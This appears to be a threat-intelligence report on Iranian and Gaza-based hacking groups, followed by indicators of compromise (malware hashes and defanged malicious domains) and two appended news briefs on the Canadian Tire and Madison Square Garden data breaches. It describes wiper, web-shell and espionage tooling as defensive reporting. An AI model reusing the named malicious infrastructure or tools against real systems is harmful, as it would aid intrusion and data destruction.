Organizations should prioritize resilience against destructive attacks by conducting the following tasks:

Isolating backup infrastructure from production networks
Enable immutable backups
Test disaster recovery procedures regularly
Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.

Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.

Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.

Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).

Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.

Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).

On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.

Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

HTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells
Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

Indicators of Compromise (IOCs)
0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor

1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor

2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor

2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor

42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor

7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor

7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor

b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor

bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor

c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor

077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset

15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset

2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset

4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset

64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset

64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset

74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset

94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset

a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset

a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset

ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset

24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp

A92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - - Trojan.Stagecomp

3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp

Network Indicators

gitempire.s3.us-east-005.backblazeb2[.]com

elvenforest.s3.us-east-005.backblazeb2[.]com

uppdatefile[.]com

serialmenot[.]com

moonzonet[.]com

securityweek.com
ByIonut Arghire| February 28, 2026 (6:50 AM ET)

More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire.

The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said.

“The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark’s/L’Équipeur and Party City,” the retail giant announced in October.

Canadian Tire said at the time that the compromised information included names, email addresses, dates of birth, encrypted passwords, and, in some cases, incomplete credit card numbers.

Fewer than 150,000 accounts had date of birth details compromised, the company said.

Canadian Tire also underlined that the password and credit card information could not be used to access users’ accounts or to perform fraudulent transactions and purchases, and that no Canadian Tire Bank information or Triangle Rewards loyalty data was compromised in the incident.

This week, the data set associated with the incident was added to the data breach notification website Have I Been Pwned.

According to the website, roughly 42 million records were compromised in the attack, including 38.3 million email addresses. In addition to the details shared by Canadian Tire, the leaked compromised data also includes addresses, phone numbers, and gender information.

“Passwords were stored as PBKDF2 hashes, and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry, and masked card number),” Have I Been Pwned notes.

Canadian Tire has notified the affected individuals via email but has yet to publicly confirm the number of victims.

securityweek.com
ByEduard Kovacs| March 2, 2026 (8:53 AM ET)

The company is one of the many victims of the 2025 Oracle E-Business Suite (EBS) hacking campaign.

Madison Square Garden has confirmed being impacted by a data breach stemming from a cybercrime campaign targeting customers of Oracle’s E-Business Suite (EBS) solution.

In the Oracle EBS hacking campaign, the Cl0p ransomware and extortion group exploited zero-day vulnerabilities to gain access to data stored by more than 100 organizations in the enterprise management software.

Madison Square Garden (MSG), the world-famous arena located in New York City, was named by the hackers as a victim of the campaign in November 2025.

Data allegedly stolen from the company — more than 210GB of archive files — was leaked by the cybercriminals soon after, indicating that it had refused to pay a ransom.

MSG did not respond to repeated requests for comment at the time. However, it has now confirmed suffering a data breach and it has started notifying individuals whose personal information was compromised as a result of the cybersecurity incident.

According to notifications from MSG Entertainment, the impacted Oracle EBS instance is hosted and managed by a third-party vendor, whose investigation found that hackers stole data in August 2025.

The entertainment company said personal information, including names and SSNs, was compromised.

It’s unclear how many people are affected in total, but MSG Entertainment told the Maine Attorney General’s Office that 11 of the state’s residents are impacted.